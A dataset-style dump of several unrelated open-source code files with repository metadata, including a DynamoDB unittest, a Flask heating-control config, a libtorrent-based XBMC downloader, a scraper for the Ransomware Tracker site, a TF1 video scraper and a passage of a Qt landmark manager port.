repo_name (string) | path (string) | copies (string) | size (string) | content (string) | license (string) | hash (int64) | line_mean (float64) | line_max (int64) | alpha_frac (float64) | autogenerated (bool) |
---|---|---|---|---|---|---|---|---|---|---|
nyu-mhealth/project-smsurvey | main/smsurvey/tests/survey/core/services/test_survey_state_service.py | 1 | 3788 |
import inspect
import os
import sys
import unittest
import boto3
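# Climb five directory levels so that the project root (the directory that
# contains the "smsurvey" package) ends up on sys.path.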
c = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
p = os.path.dirname(c)
pp = os.path.dirname(p)
ppp = os.path.dirname(pp)
pppp = os.path.dirname(ppp)
ppppp = os.path.dirname(pppp)
sys.path.insert(0, ppppp)
from smsurvey import config
from core.model.model.survey import SurveyState, SurveyStateOperationException, SurveyStatus
# Assumed import paths: the original file uses the two names below without
# importing them; the exact modules may differ in the real repository.
from core.services.survey_state_service import SurveyStateService
from core.services import create_survey_state_cache
class TestSurveyStateService(unittest.TestCase):
@classmethod
def setUpClass(cls):
dynamo = boto3.client('dynamodb', region_name='us-west-2', endpoint_url=config.dynamo_url)
if 'SurveyStateTest' in dynamo.list_tables()['TableNames']:
dynamo.delete_table(TableName='SurveyStateTest')
create_survey_state_cache.create_cache('SurveyStateTest')
cls.service = SurveyStateService(config.dynamo_url, 'SurveyStateTest')
def test_insert_new_survey_state(self):
survey = SurveyState.new_state_object("1", "test", "1")
self.service.insert(survey)
survey_received = self.service.get("1", "1")
self.assertTrue(survey == survey_received)
def test_insert_new_survey_state_safe_mode_off(self):
survey = SurveyState.new_state_object("1", "test", "2")
self.service.insert(survey, False)
survey_received = self.service.get("1", "2")
self.assertTrue(survey == survey_received)
def test_insert_new_survey_state_safe_mode_off_key_exists(self):
survey = SurveyState.new_state_object("1", "test", "3")
self.service.insert(survey, False)
survey_received = self.service.get("1", "3")
self.assertTrue(survey == survey_received)
def test_insert_new_survey_key_exists(self):
survey = SurveyState.new_state_object("1", "test", "4")
self.service.insert(survey)
self.assertRaises(SurveyStateOperationException, self.service.insert, survey)
def test_get_object_exists(self):
survey = SurveyState.new_state_object("2", "test", "1")
self.service.insert(survey)
survey_received = self.service.get("2", "1")
self.assertTrue(survey == survey_received)
def test_get_object_does_not_exist(self):
survey_received = self.service.get("2", "1")
self.assertIsNone(survey_received)
def test_update_object(self):
survey = SurveyState.new_state_object("3", "test", "1")
self.service.insert(survey)
survey_received = self.service.get("3", "1")
survey_received.survey_status = SurveyStatus.TERMINATED_COMPLETE
self.service.update(survey_received)
survey_received = self.service.get("3", "1")
self.assertTrue(survey_received.survey_status == SurveyStatus.TERMINATED_COMPLETE)
def test_update_object_invalid_update_different_versions(self):
survey = SurveyState.new_state_object("3", "test", "9")
self.service.insert(survey)
survey_received = self.service.get("3", "9")
survey_received.survey_state_version = 1337
self.assertRaises(SurveyStateOperationException, self.service.update, survey_received)
def test_delete_object(self):
survey = SurveyState.new_state_object("4", "test", "1")
self.service.insert(survey)
survey_received = self.service.get("4", "1")
self.assertTrue(survey == survey_received)
self.service.delete("4_1")
survey_received = self.service.get("4", "1")
self.assertIsNone(survey_received)
def test_delete_object_key_not_exist(self):
self.service.delete("4_3")
@classmethod
def tearDownClass(cls):
dynamo = boto3.client('dynamodb', region_name='us-west-2', endpoint_url=config.dynamo_url)
dynamo.delete_table(TableName='SurveyStateTest')
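# Running this suite (assumption: it expects a DynamoDB-compatible endpoint at
# config.dynamo_url, e.g. DynamoDB Local):
#
#     python -m unittest test_survey_state_service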
| gpl-3.0 | -8,016,080,256,036,934,000 | 38.458333 | 98 | 0.671859 | false |
paulfantom/Central-Heating-webpage | config.py | 1 | 3914 |
# -*- coding: UTF-8 -*-
from flask_babel import lazy_gettext  # the flask.ext.* import shim has been removed
import os
basedir = os.path.abspath(os.path.dirname(__file__))
MQTT_ID = 'webclient'
SERVER_IP = "127.0.0.1"
MYSQL_USER = 'mqttwarn'
MYSQL_PASS = ''
#SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://' + MYSQL_USER + ':' + MYSQL_PASS + '@localhost/mqtt_data'
BCRYPT_LOG_ROUNDS = 12
WTF_CSRF_ENABLED = True
SECRET_KEY = 'you-will-never-guess'
LANGUAGES = {
'en': 'English',
'pl': 'Polski'
}
BABEL_DEFAULT_LOCALE = 'pl'
WEEKDAYS = [lazy_gettext('Monday'),
lazy_gettext('Tuesday'),
lazy_gettext('Wednesday'),
lazy_gettext('Thursday'),
lazy_gettext('Friday'),
lazy_gettext('Saturday'),
lazy_gettext('Sunday')]
DESCRIPTIONS = {
'circulation': {
'interval' : {
'title' : lazy_gettext('Interval'),
'desc' : lazy_gettext('Set pump interval in water consumption mode'),
'range' : [1,180],
'unit' : ' min'
},
'time_on' : {
'title' : lazy_gettext('ON time'),
'desc' : lazy_gettext('Set pump mixing time in water consumption mode'),
'range' : [1,300],
'unit' : ' s'
}},
'heater' : {
'expected': {
'title' : lazy_gettext('Expected room temperature'),
'desc' : lazy_gettext('Override scheduled room temperature for 60 minutes'),
'range' : [15,28],
'step' : 0.1,
'unit' : u'°C'
},
'critical' : {
'title' : lazy_gettext('Critical'),
'desc' : lazy_gettext('Set heater critical temperature'),
'range' : [40,100],
'step' : 1,
'unit' : u'°C'
},
'hysteresis' : {
'title' : lazy_gettext('Hysteresis'),
'desc' : lazy_gettext('Set heater hysteresis for central heating'),
'range' : [0,2],
'step' : 0.01,
'unit' : u'°C'
}},
'solar': {
'temp_off' : {
'title' : lazy_gettext('Temperature difference (OFF)'),
'desc' : lazy_gettext('Temperature difference needed to stop solar system'),
'range' : [0.1,15],
'step' : 0.1,
'unit' : u'°C'
},
'temp_on' : {
'title' : lazy_gettext('Temperature difference (ON)'),
'desc' : lazy_gettext('Temperature difference needed to start solar system'),
'range' : [0.1,15],
'step' : 0.1,
'unit' : u'°C'
},
'critical' : {
'title' : lazy_gettext('Critical temperature'),
'desc' : lazy_gettext('Temperature of solar system turning off'),
'range' : [80,200],
'unit' : u'°C'
}},
'tank' : {
'solar_max' : {
'title' : lazy_gettext('Solar'),
'desc' : lazy_gettext('DHW maximum temperature with solar system usage'),
'range' : [30,100],
'unit' : u'°C'
},
'heater_max' : {
'title' : lazy_gettext('Heater (max)'),
'desc' : lazy_gettext('DHW maximum temperature with heater system usage'),
'range' : [30,90],
'unit' : u'°C'
},
'heater_min' : {
'title' : lazy_gettext('Heater (min)'),
'desc' : lazy_gettext('DHW minimum temperature with heater system usage'),
'range' : [20,60],
'unit' : u'°C'
}},
'schedule' : {
'override_temp': {
'title' : lazy_gettext('Room temperature'),
'desc' : lazy_gettext('Override scheduled room temperature for 1 hour'),
'range' : [15,28],
'step' : 0.1,
'unit' : u'°C'
}}
}
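# Illustrative read of the structure above (hypothetical view code, not part
# of this config file):
#
#     from config import DESCRIPTIONS
#     field = DESCRIPTIONS['heater']['hysteresis']
#     low, high = field['range']                      # 0 .. 2
#     label = u"%s [%s%s]" % (field['title'], high, field['unit'])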
| mpl-2.0 | 8,347,552,832,554,916,000 | 31.806723 | 101 | 0.478484 | false |
BigEgg/LeetCode | Python/LeetCode.Test/_001_050/Test_040_CombinationSum2.py | 1 | 1220 |
import unittest
import pytest
import sys
sys.path.append('LeetCode/_001_050')
sys.path.append('LeetCode.Test')
from _040_CombinationSum2 import Solution
import AssertHelper
class Test_040_CombinationSum2(unittest.TestCase):
@pytest.mark.timeout(1)
def test_combinationSum2_1(self):
candidates = [10,1,2,7,6,1,5]
target = 8
solution = Solution()
AssertHelper.assertArray([ [1, 1, 6], [1, 2, 5], [1, 7], [2, 6] ], solution.combinationSum2(candidates, target))
@pytest.mark.timeout(1)
def test_combinationSum2_2(self):
candidates = [2,5,2,1,2]
target = 5
solution = Solution()
AssertHelper.assertArray([ [1,2,2], [5] ], solution.combinationSum2(candidates, target))
@pytest.mark.timeout(1)
def test_combinationSum2_notExist(self):
candidates = [3,6,7]
target = 5
solution = Solution()
AssertHelper.assertArray([], solution.combinationSum2(candidates, target))
@pytest.mark.timeout(1)
def test_combinationSum2_emptyCandidates(self):
candidates = []
target = 5
solution = Solution()
AssertHelper.assertArray([], solution.combinationSum2(candidates, target))
| mit | 3,079,392,301,025,578,000 | 30.282051 | 120 | 0.651639 | false |
DiMartinoX/plugin.video.kinopoisk.ru | patch_for_plugin.video.torrenter_ver_1.2.7/Downloader.py | 1 | 14030 |
#-*- coding: utf-8 -*-
'''
Torrenter plugin for XBMC
Copyright (C) 2012 Vadim Skorba
vadim.skorba@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import time
import thread
import os
import urllib2
import hashlib
import re
import xbmc
import xbmcgui
import xbmcvfs
import Localization
class Torrent:
torrentFile = None
magnetLink = None
storageDirectory = ''
torrentFilesDirectory = 'torrents'
startPart = 0
endPart = 0
partOffset = 0
torrentHandle = None
session = None
downloadThread = None
threadComplete = False
lt = None
def __init__(self, storageDirectory = '', torrentFile = '', torrentFilesDirectory = 'torrents'):
#http://www.rasterbar.com/products/libtorrent/manual.html
'''try:
import platform
if 'Linux' == platform.system():
if 'x86_64' == platform.machine():
from python_libtorrent.linux_x86_64 import libtorrent
else:
from python_libtorrent.linux_x86 import libtorrent
else:
from python_libtorrent.windows import libtorrent
except ImportError, v:
try:
import libtorrent
except ImportError, v:
raise ImportError("The script.module.libtorrent module is not installed, libtorrent not found or unsupported system used")'''
try:
from python_libtorrent.linux_x86_64 import libtorrent
except:
pass
try:
from python_libtorrent.linux_x86 import libtorrent
except:
pass
try:
from python_libtorrent.windows import libtorrent
except:
pass
try:
import libtorrent
except:
pass
'''except ImportError, v:
raise ImportError("The script.module.libtorrent module is not installed, libtorrent not found or unsupported system used")'''
self.lt = libtorrent
del libtorrent
self.torrentFilesDirectory = torrentFilesDirectory
self.storageDirectory = storageDirectory
if not xbmcvfs.exists(self.storageDirectory + os.sep + self.torrentFilesDirectory):
self._makedirs(self.storageDirectory + os.sep + self.torrentFilesDirectory)
if xbmcvfs.exists(torrentFile):
self.torrentFile = torrentFile
self.torrentFileInfo = self.lt.torrent_info(self.torrentFile)
elif re.match("^magnet\:.+$", torrentFile):
self.magnetLink = torrentFile
def saveTorrent(self, torrentUrl):
if re.match("^magnet\:.+$", torrentUrl):
self.magnetLink = torrentUrl
self.magnetToTorrent(torrentUrl)
return self.magnetLink
else:
torrentFile = self.storageDirectory + os.sep + self.torrentFilesDirectory + os.sep + self.md5(torrentUrl) + '.torrent'
try:
request = urllib2.Request(torrentUrl)
request.add_header('Referer', torrentUrl)
localFile = open(torrentFile, "w+b")
result = urllib2.urlopen(request)
localFile.write(result.read())
localFile.close()
except:
print 'Unable to save torrent file from "' + torrentUrl + '" to "' + torrentFile + '" in Torrent::saveTorrent'
return
if xbmcvfs.exists(torrentFile):
try:
self.torrentFileInfo = self.lt.torrent_info(torrentFile)
except:
xbmcvfs.delete(torrentFile)
return
baseName = os.path.basename(self.getFilePath())
newFile = self.storageDirectory + os.sep + self.torrentFilesDirectory + os.sep + baseName + '.' + self.md5(torrentUrl) + '.torrent'
try:newFile.decode('utf-8', 'ignore').encode('ascii', 'ignore')
except:newFile = newFile.encode('ascii', 'ignore')
try:xbmcvfs.delete(newFile)
except:pass
if not xbmcvfs.exists(newFile):
try:
xbmcvfs.rename(torrentFile, newFile)
except:
print 'Unable to rename torrent file from "' + torrentFile + '" to "' + newFile + '" in Torrent::renameTorrent'
return
self.torrentFile = newFile
self.torrentFileInfo = self.lt.torrent_info(self.torrentFile)
return self.torrentFile
def getMagnetInfo(self):
magnetSettings = {
'save_path': self.storageDirectory,
'storage_mode': self.lt.storage_mode_t(2),
'paused': True,
'auto_managed': True,
'duplicate_is_error': True
}
progressBar = xbmcgui.DialogProgress()
progressBar.create(Localization.localize('Please Wait'), Localization.localize('Magnet-link is converting.'))
self.torrentHandle = self.lt.add_magnet_uri(self.session, self.magnetLink, magnetSettings)
iterator = 0
while not self.torrentHandle.has_metadata():
time.sleep(0.1)
progressBar.update(iterator)
iterator += 1
if iterator == 100:
iterator = 0
if progressBar.iscanceled():
progressBar.update(0)
progressBar.close()
return
progressBar.update(0)
progressBar.close()
return self.torrentHandle.get_torrent_info()
def magnetToTorrent(self, magnet):
self.magnetLink = magnet
self.initSession()
torrentInfo = self.getMagnetInfo()
try:
torrentFile = self.lt.create_torrent(torrentInfo)
baseName = os.path.basename(self.storageDirectory + os.sep + torrentInfo.files()[0].path).decode('utf-8').encode('ascii', 'ignore')
self.torrentFile = self.storageDirectory + os.sep + self.torrentFilesDirectory + os.sep + baseName + '.torrent'
torentFileHandler = open(self.torrentFile, "wb")
torentFileHandler.write(self.lt.bencode(torrentFile.generate()))
torentFileHandler.close()
self.torrentFileInfo = self.lt.torrent_info(self.torrentFile)
except:
xbmc.executebuiltin("Notification(%s, %s, 7500)" % (Localization.localize('Error'), Localization.localize('Your library out of date and can\'t save magnet-links.')))
self.torrentFileInfo = torrentInfo
def getUploadRate(self):
if None == self.torrentHandle:
return 0
else:
return self.torrentHandle.status().upload_payload_rate
def getDownloadRate(self):
if None == self.torrentHandle:
return 0
else:
return self.torrentHandle.status().download_payload_rate
def getPeers(self):
if None == self.torrentHandle:
return 0
else:
return self.torrentHandle.status().num_peers
def getSeeds(self):
if None == self.torrentHandle:
return 0
else:
return self.torrentHandle.status().num_seeds
def getFileSize(self, contentId = 0):
return self.getContentList()[contentId].size
def getFilePath(self, contentId = 0):
return self.storageDirectory + os.sep + self.getContentList()[contentId].path.decode('utf8')
def getContentList(self):
return self.torrentFileInfo.files()
def setUploadLimit(self, bytesPerSecond):
self.session.set_upload_rate_limit(int(bytesPerSecond))
def setDownloadLimit(self, bytesPerSecond):
self.session.set_download_rate_limit(int(bytesPerSecond))
def md5(self, string):
hasher = hashlib.md5()
try:hasher.update(string)
except:hasher.update(string.encode('utf-8','ignore'))
return hasher.hexdigest()
def downloadProcess(self, contentId):
for part in range(self.startPart, self.endPart + 1):
self.getPiece(part)
time.sleep(0.1)
self.checkThread()
self.threadComplete = True
def initSession(self):
try:
self.session.remove_torrent(self.torrentHandle)
except:
pass
self.session = self.lt.session()
self.session.start_dht()
self.session.add_dht_router("router.bittorrent.com", 6881)
self.session.add_dht_router("router.utorrent.com", 6881)
self.session.add_dht_router("router.bitcomet.com", 6881)
self.session.listen_on(6881, 6891)
self.session.set_alert_mask(self.lt.alert.category_t.storage_notification)
def startSession(self, contentId = 0, seeding = True):
self.initSession()
if None == self.magnetLink:
self.torrentHandle = self.session.add_torrent({'ti': self.torrentFileInfo, 'save_path': self.storageDirectory})
else:
self.torrentFileInfo = self.getMagnetInfo()
selectedFileInfo = self.getContentList()[contentId]
self.partOffset = 50 * 1024 * 1024 / self.torrentFileInfo.piece_length()#50 MB
#print 'partOffset ' + str(self.partOffset)
self.startPart = selectedFileInfo.offset / self.torrentFileInfo.piece_length()
self.endPart = (selectedFileInfo.offset + selectedFileInfo.size) / self.torrentFileInfo.piece_length()
for i in range(self.torrentFileInfo.num_pieces()):
self.torrentHandle.piece_priority(i, 0)
for i in range(self.startPart, self.startPart + self.partOffset):
if i <= self.endPart:
self.torrentHandle.piece_priority(i, 7)
self.torrentHandle.piece_priority(self.endPart, 7)
self.torrentHandle.set_sequential_download(True)
thread.start_new_thread(self.downloadProcess, (contentId,))
if seeding:# and None == self.magnetLink:
thread.start_new_thread(self.addToSeeding, ())
def addToSeeding(self):
for filename in os.listdir(self.storageDirectory + os.sep + self.torrentFilesDirectory):
currentFile = self.storageDirectory + os.sep + self.torrentFilesDirectory + os.sep + filename
if re.match('^.+\.torrent$', currentFile):
info = self.lt.torrent_info(currentFile)
fileSettings = {
'ti': info,
'save_path': self.storageDirectory,
'paused': False,
'auto_managed': False,
'seed_mode': True,
}
self.session.add_torrent(fileSettings)
def fetchSeekBytes(self, bytes):
seekPartsOffset = self.startPart + bytes / self.torrentFileInfo.piece_length()
priorities = self.torrentHandle.piece_priorities()
status = self.torrentHandle.status()
if len(status.pieces) == 0:
return
if status.pieces[seekPartsOffset] == False:
self.checkThread()
self.torrentHandle.piece_priority(seekPartsOffset, 7)
def fetchParts(self):
priorities = self.torrentHandle.piece_priorities()
status = self.torrentHandle.status()
downloading = 0
#print priorities
if len(status.pieces) == 0:
return
for part in range(self.startPart, self.endPart + 1):
if priorities[part] != 0 and status.pieces[part] == False:
self.checkThread()
downloading += 1
for part in range(self.startPart, self.endPart + 1):
if priorities[part] == 0 and downloading < self.partOffset:
self.checkThread()
self.torrentHandle.piece_priority(part, 1)
downloading += 1
for part in range(self.startPart, self.endPart + 1):
if priorities[part] != 0 and status.pieces[part] == False:
self.checkThread()
break
def checkThread(self):
if self.threadComplete == True:
self.session.remove_torrent(self.torrentHandle)
thread.exit()
def getPiece(self, index):
cache = {}
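# NOTE: this cache dict is re-created on every call, so pieces stashed from
# out-of-order read_piece_alert events below never survive between calls.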
if index in cache:
result = cache[index]
cache[index] = 0
return result
while True:
status = self.torrentHandle.status()
if len(status.pieces) == 0:
break
if status.pieces[index] == True:
break
time.sleep(0.5)
self.checkThread()
self.torrentHandle.read_piece(index)
while True:
part = self.session.pop_alert()
if isinstance(part, self.lt.read_piece_alert):
if part.piece == index:
return part.buffer
else:
cache[part.piece] = part.buffer
break
time.sleep(0.5)
self.checkThread()
def _makedirs(self, _path):
success = False
if (xbmcvfs.exists(_path)):
return True
# temp path
tmppath = _path
# loop thru and create each folder
while (not xbmcvfs.exists(tmppath)):
success = xbmcvfs.mkdir(tmppath)
if not success:
tmppath = os.path.dirname(tmppath)
# call function until path exists
self._makedirs(_path)
| gpl-3.0 | 6,123,942,873,642,952,000 | 39.085714 | 177 | 0.595795 | false |
PaulSec/ransomware-tracker | ransomwaretracker/ransomwareTrackerAPI.py | 1 | 5215 |
"""
This is the (unofficial) Python API for http://ransomwaretracker.abuse.ch/tracker/ Website.
"""
from __future__ import print_function
from bs4 import BeautifulSoup
from enum import Enum
import requests
import sys
import json
class Threat(Enum):
def __str__(self):
return str(self.value)
c2 = 'c2'
payment_sites = 'payment-sites'
distribution_sites = 'distribution-sites'
class Malware(Enum):
def __str__(self):
return str(self.value)
TeslaCrypt = 'teslacrypt'
CryptoWall = 'cryptowall'
TorrentLocker = 'torrentlocker'
PadCrypt = 'padcrypt'
Locky = 'locky'
CTB_Locker = 'ctb-locker'
FAKBEN = 'fakben'
PayCrypt = 'paycrypt'
DMALocker = 'dmalocker'
Cerber = 'cerber'
class RansomwareTracker(object):
"""RansomwareTracker Main Handler"""
_base_url = 'http://ransomwaretracker.abuse.ch/tracker/'
def __init__(self, verbose=False):
self.verbose = verbose
def display_message(self, s):
if self.verbose:
print('[verbose] %s' % s)
def extract_info_host(self, soup):
res = {}
res['host_information'] = {}
table_host = soup.find('table', attrs={'class': 'tablehost'})
for index, tr in enumerate(table_host.findAll('tr')):
if index == 5:
res['host_information']['blacklist_check'] = {}
try:
res['host_information']['blacklist_check']['Spamhaus_DBL'] = tr.find('a')['href']
except:
res['host_information']['blacklist_check']['Spamhaus_DBL'] = 'not_listed'
elif index == 6:
try:
res['host_information']['blacklist_check']['SURBL'] = tr.find('a')['href']
except:
res['host_information']['blacklist_check']['SURBL'] = 'not_listed'
else:
res['host_information'][tr.find('th').text[:-1].replace(' ', '_')] = tr.find('td').text
table_host = soup.find('table', attrs={'class': 'maintable'})
res['results'] = []
for tr in table_host.findAll('tr')[1:]:
tds = tr.findAll('td')
tmp_res = {
'active': tds[0].text,
'first_seen': tds[1].text,
'last_seen': tds[2].text,
'ip_address': tds[3].find('a').contents[0],
'hostname': tds[4].text,
'SBL': tds[5].text,
'as_number': tds[6].text,
'as_name': tds[7].text,
'country': tds[8].text
}
res['results'].append(tmp_res)
return res
def host(self, host):
# p27dokhpz2n7nvgr.15jznv.top
url = 'http://ransomwaretracker.abuse.ch/host/{}/'.format(host)
req = requests.get(url)
if req.status_code != 200:
print(
u"Unexpected status code from {url}: {code}".format(
url=url, code=req.status_code),
file=sys.stderr,
)
return []
soup = BeautifulSoup(req.content, 'html.parser')
return json.dumps(self.extract_info_host(soup))
def extract_info_table(self, table):
res = {}
res['matches'] = []
trs = table.findAll('tr')
for tr in trs[1:]:
tds = tr.findAll('td')
data = {
'date_added': tds[0].text,
'threat': tds[1].text,
'malware': tds[2].text,
'host': tds[3].find('a').contents[0],
'domain_registrar': tds[4].text,
'ip_address': tds[5].text
}
res['matches'].append(data)
res['total'] = len(res['matches'])
return res
def retrieve_results(self, page=0, filter_with=None):
sslbl_url = self._base_url
if filter_with is not None:
sslbl_url += str(filter_with)
if page != 0:
sslbl_url += 'page/{}'.format(page)
req = requests.get(sslbl_url)
if req.status_code != 200:
print(
u"Unexpected status code from {url}: {code}".format(
url=sslbl_url, code=req.status_code),
file=sys.stderr)
return []
soup = BeautifulSoup(req.content, 'html.parser')
table = soup.findAll('table', attrs={'class': 'maintable'})[0]
return json.dumps(self.extract_info_table(table))
def search(self, s):
sslbl_url = self._base_url + '?search={}'.format(s)
req = requests.get(sslbl_url)
if req.status_code != 200:
print(
u"Unexpected status code from {url}: {code}".format(
url=sslbl_url, code=req.status_code),
file=sys.stderr)
return []
soup = BeautifulSoup(req.content, 'html.parser')
table = soup.findAll('table', attrs={'class': 'maintable'})[0]
return json.dumps(self.extract_info_table(table))
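# Minimal usage sketch (not part of the original module; the abuse.ch tracker
# has since been retired, so treat the calls below as illustrative only):
if __name__ == '__main__':
    tracker = RansomwareTracker(verbose=True)
    print(tracker.retrieve_results(filter_with=Malware.Locky))
    print(tracker.search('locky'))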
| mit | -3,121,349,289,463,922,700 | 31.391304 | 103 | 0.521189 | false |
audetto/andsoft | python/rai/asi/TF1.py | 1 | 4335 |
import os
import datetime
import json
from asi import Utils
from asi import Config
from asi import Base
programsUrl = "http://api.tf1.fr/tf1-programs/iphone/limit/100/"
newsUrl = "http://api.tf1.fr/tf1-homepage-news/iphone/"
homepageUrl = "http://api.tf1.fr/tf1-homepage/iphone/"
def getDataUrl(progId, item):
url = "http://api.tf1.fr/tf1-vods/iphone//integral/{0}/program_id/{1}".format(item, progId)
return url
def getWatLink(watId):
url = "http://www.wat.tv/get/iphone/{0}.m3u8?bwmin=100000&bwmax=490000".format(watId)
return url
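# Illustrative output of the two URL builders above, for a hypothetical
# program id "147":
#   getDataUrl("147", 0)  -> http://api.tf1.fr/tf1-vods/iphone//integral/0/program_id/147
#   getWatLink("12345678") -> an .m3u8 stream URL capped between 100 and 490 kbit/s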
def parseItem(grabber, prog, name, db):
pid = str(prog["id"])
desc = prog["longTitle"]
pubDate = prog["publicationDate"]
duration = prog["duration"]
name = name + " - " + prog["shortTitle"]
wat = prog["watId"]
category = prog["videoCategory"]
length = datetime.timedelta(seconds = duration)
date = datetime.datetime.strptime(pubDate, "%Y-%m-%d %H:%M:%S")
# ignore the countless "extract", "bonus", "short" which last just a few minutes
if category == "fullvideo":
pid = Utils.getNewPID(db, pid)
p = Program(grabber, date, length, pid, name, desc, wat, category)
Utils.addToDB(db, p)
def processGroup(grabber, f, name, db):
o = json.load(f)
for prog in o:
parseItem(grabber, prog, name, db)
def processNews(grabber, f, folder, progress, downType, db):
o = json.load(f)
for prog in o:
name = prog["programName"]
groupId = prog["programId"]
downloadGroup(grabber, name, groupId, folder, progress, downType, db)
# this group contains the info of the most recent Item
# we add an other item with the group name
# some info will still be missing
title = prog["title"]
wat = prog["linkAttributes"]["watId"]
category = prog["linkAttributes"]["videoCategory"]
pid = Utils.getNewPID(db, groupId)
p = Program(grabber, datetime.datetime.now(), None, pid, name, title, wat, category)
Utils.addToDB(db, p)
def processPrograms(grabber, f, folder, progress, downType, db):
o = json.load(f)
for prog in o:
name = prog["shortTitle"]
groupId = prog["id"]
# here, we do not know the most recent item
# we simply have to go through them all
downloadGroup(grabber, name, groupId, folder, progress, downType, db)
def downloadGroup(grabber, name, groupId, folder, progress, downType, db):
# we set it to True as this is a group
# and subject to continuous changes
checkTimestamp = True
# .0
url_0 = getDataUrl(groupId, 0)
localName_0 = os.path.join(folder, str(groupId) + ".0.json")
f_0 = Utils.download(grabber, progress, url_0, localName_0, downType, "utf-8", checkTimestamp)
if f_0:
processGroup(grabber, f_0, name, db)
# .1
url_1 = getDataUrl(groupId, 1)
localName_1 = os.path.join(folder, str(groupId) + ".1.json")
f_1 = Utils.download(grabber, progress, url_1, localName_1, downType, "utf-8", checkTimestamp)
if f_1:
processGroup(grabber, f_1, name, db)
def download(db, grabber, downType):
progress = Utils.getProgress()
folder = Config.tf1Folder
localName = os.path.join(folder, "news.json")
f = Utils.download(grabber, progress, newsUrl, localName, downType, "utf-8", True)
processNews(grabber, f, folder, progress, downType, db)
localName = os.path.join(folder, "programs.json")
f = Utils.download(grabber, progress, programsUrl, localName, downType, "utf-8", True)
processPrograms(grabber, f, folder, progress, downType, db)
class Program(Base.Base):
def __init__(self, grabber, datetime, length, pid, title, desc, wat, category):
super(Program, self).__init__()
self.pid = pid
self.title = title
self.description = desc
self.channel = "tf1"
self.wat = wat
self.datetime = datetime
self.category = category
self.length = length
self.grabber = grabber
self.ts = getWatLink(self.wat)
name = Utils.makeFilename(self.title)
self.filename = self.pid + "-" + name
def display(self, width):
super(Program, self).display(width)
print()
print("Category:", self.category)
| gpl-3.0 | 6,046,164,574,876,514,000 | 28.489796 | 98 | 0.633679 | false |
mtils/ems | ems/qt4/location/landmarks/landmarkmanagerengine.py | 1 | 53932 |
'''
Created on 28.10.2011
@author: michi
'''
from PyQt4.QtCore import QObject, Qt, QVariant, pyqtSignal, QMutexLocker,\
QString
from landmarkfilter import LandmarkFilter #@UnresolvedImport
from landmarkmanager import LandmarkManager #@UnresolvedImport
from landmark import Landmark #@UnresolvedImport
from landmarkcategory import LandmarkCategory #@UnresolvedImport
from ems.qt4.location.landmarks.landmarksortorder import LandmarkSortOrder #@UnresolvedImport
from landmarkattributefilter import LandmarkAttributeFilter #@UnresolvedImport
from landmarkboxfilter import LandmarkBoxFilter #@UnresolvedImport
from landmarkcategoryfilter import LandmarkCategoryFilter #@UnresolvedImport
from landmarkintersectionfilter import LandmarkIntersectionFilter #@UnresolvedImport
from landmarkidfilter import LandmarkIdFilter #@UnresolvedImport
from landmarknamefilter import LandmarkNameFilter #@UnresolvedImport
def matchString(sourceStr, matchStr, matchFlags):
'''
@param sourceStr: The source
@type sourceStr: str
@param matchStr: The matching string (if)
@type matchStr: str
@param matchFlags: LandmarkFilter.MatchFlags "Enum"
@type matchFlags: int
@rtype: bool
'''
if not (matchFlags & LandmarkFilter.MatchCaseSensitive):
sourceStr = sourceStr.lower()
matchStr = matchStr.lower()
if (matchFlags & 3) == LandmarkFilter.MatchEndsWith:
return sourceStr.endswith(matchStr)
elif (matchFlags & 3) == LandmarkFilter.MatchStartsWith:
return sourceStr.startswith(matchStr)
elif (matchFlags & 3) == LandmarkFilter.MatchContains:
return (sourceStr.find(matchStr) != -1)
else:
return (sourceStr == matchStr)
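# Illustrative behaviour, assuming Qt-style match-flag values on LandmarkFilter:
#   matchString("Berlin", "ber", LandmarkFilter.MatchStartsWith) -> True
#   matchString("Berlin", "ber", LandmarkFilter.MatchStartsWith
#               | LandmarkFilter.MatchCaseSensitive)             -> False
#   matchString("Berlin", "lin", LandmarkFilter.MatchEndsWith)   -> True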
def getLandmarkAttribute(key, landmark):
'''
@param key: The attribute name
@type key: str
@param landmark: Landmark
@type landmark: Landmark
@rtype: QVariant
'''
if key == "name":
return landmark.name();
elif key == "description":
return landmark.description();
elif key == "countryCode":
return landmark.address().countryCode();
elif key == "country":
return landmark.address().country();
elif key == "state":
return landmark.address().state();
elif key == "city":
return landmark.address().city();
elif key == "district":
return landmark.address().district();
elif key == "district":
return landmark.address().district();
elif key == "street":
return landmark.address().street();
elif key == "postcode":
return landmark.address().postcode();
elif key == "phoneNumber":
return landmark.phoneNumber();
else:
return QVariant(); # shouldn't be possible
commonLandmarkKeys = ("name", "description", "countryCode", "country", "state",
"county", "city", "district", "street", "postcode",
"phoneNumber")
class LandmarkManagerEngine(QObject):
'''
\brief The QLandmarkManagerEngine class provides the interface for all implementations
of the landmark manager backend functionality.
Instances of this class are usually provided by \l QLandmarkManagerEngineFactory, which is loaded
from a plugin.
'''
dataChanged = pyqtSignal()
'''This signal is emitted some time after changes occur to the datastore managed by this
engine, and the engine is unable to precisely determine which changes occurred, or if the
engine considers the changes to be radical enough to require clients to reload all data.
If this signal is emitted, no other signals may be emitted for the associated changes.
As it is possible that other processes (or other devices) may have caused the
changes, the timing can not be determined.'''
landmarksAdded = pyqtSignal(list)
'''This signal is emitted some time after a set of landmarks has been added to
the datastore managed by the engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may
have added the landmarks, the exact timing cannot be determined.
There may be one or more landmark identifiers in the \a landmarkIds list.'''
landmarksChanged = pyqtSignal(list)
'''This signal is emitted some time after a set of landmarks have been modified in
the datastore managed by this engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may have modified the landmarks,
the timing cannot be determined.
Note that removal of a category will not trigger a \c landmarksChanged signal for landmarks belonging to that category.
There may be one or more landmark identifiers in the \a landmarkIds list.'''
landmarksRemoved = pyqtSignal(list)
'''This signal is emitted some time after a set of landmarks have been removed from the
datastore managed by this engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may have removed the landmarks,
